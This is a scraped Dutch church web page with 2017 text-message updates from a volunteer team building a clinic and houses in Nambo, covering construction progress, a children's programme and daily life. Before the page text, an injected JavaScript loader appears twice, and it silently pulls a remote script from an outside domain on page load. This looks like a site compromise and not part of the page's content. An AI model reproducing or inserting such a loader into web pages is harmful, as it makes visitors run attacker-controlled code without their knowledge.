;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ZA317 | Genieten van de emmerdouche, - PKN Damwâld

ZA317 | Genieten van de emmerdouche,

Gepubliceerd op: zondag 6 augustus 2017

Bericht van vrijdag 4 augustus

Gister was de eerste bouwdag in Nambo. En het gaat als een speer, aldus hoofdleider Jan. Vandaag twee verjaardagen vieren: Anniek en Alie zijn jarig ?

‘Het gaat als een speer op de bouwplaats: de kozijnen van de kliniek staan er al. Het kinderprogramma is gister ook gestart. We genoten er allemaal van: de 150 kinderen die hard meededen en wij net zo goed. We genieten trouwens ook van onze emmerdouche, zeker na zo’n bouwdag!

Bericht van zaterdag 5 augustus

Bouwdag twee is achter de rug in Nambo en je kunt veel doen in twee dagen: Kliniek en woonhuis 1 zijn al tot boven deurhoogte opgemetseld. Nu tijd voor weekend en heel wat andere ervaringen. Jan SMS’t erover:

Zaterdagmiddag werkten de meesten door, een aantal mensen had even een vrije middag: Douchen, haren doen, ff nette kleding aan. Heeerlijk. En omringd door donkere kinderen ff kletsen, schrijven of boeklezen. Drie waslijnen vol kleding. Op zaterdag waren er maar vijftien kidneren bij het kinderprogramma. We zien ook wel uit naar morgen: Kerk en cultuur. Wat voor ervaring wordt dat? Met onze gezondheid gaat het prima. En voor Akkie was er vanmiddag al een hoogtepunt waar ze naar uit zeg: ze heeft een baby op de rug gedragen ??. Project geslaagd ✅?. Groet Jan